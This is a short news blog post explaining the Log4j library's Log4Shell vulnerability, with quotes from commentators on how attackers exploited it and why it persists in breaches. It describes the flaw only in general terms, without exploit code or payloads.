Read Time:1 Minute, 43 Second

Log4j was initially released in October 1999. It got much attention in December 2021, when critical vulnerabilities were made public. And to this day, threat actors still exploit its exposure.

Apache Log4j is one of the most utilised open-source software. It is a software library within an application or java service. It logs all system events automatically. And by nature, users are commonly unaware that it is running in the background.

David Nalley, president of the Apache Software Foundation, notes that “Logging is fundamental to any computer software or hardware operation. Whether it’s a phlebotomy machine or an application server, Logging is going to be present.”

In the latter part of 2021, it was identified that it had one critical flaw. When the Log4j library logs system events, it uses a standard set of interfaces for accessing Java Naming and Directory Interface (JNDI). 

Kaspersky tech author Leonid Grustniy recounts that the system’s vulnerability is that when it logs, it becomes capable of running JNDI commands passed to it by an event like in the header field of a request, a chat message or even the description of a 404 error message.

According to Grustniy, “The vulnerability allows cybercriminals, at least theoretically, to do whatever they like on the victim’s system (if no additional security measures kick in). In practice, attackers often used Log4Shell to install illegal miners and carry out ransomware attacks. But there have been more exotic uses, including targeted attacks, spreading the Mirai botnet, and even RickRolling playing the ‘Never Gonna Give You Up’ hit by 80s crooner Rick Astley.”

To this day, attackers are still actively exploiting Log4Shell, despite numerous patches deployed to prevent it from happening. According to Chainguard CEO Dan Lorenc, “Log4Shell is going to show up in data breaches for the next decade as part of the root cause—all it takes is one instance of Log4Shell to be vulnerable.” He also added that when the vulnerability was first detected, the entire cybersecurity community scrambled to ensure attackers would not be able to impact most consumers.

About Post Author

Christopher Clark

christophermasonclark@gmail.com
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
Total
0
Shares
Share 0
Tweet 0
Pin it 0
Share 0
0 0
In, ,
online dating Previous post Sydney Woman Falls Prey to “Pig Butchering” Scam In Search of Romance
Person Editing Photos on Mobile Phone Next post Lensa AI: The Future of Data Protection or the End of Privacy as We Know It?

More Stories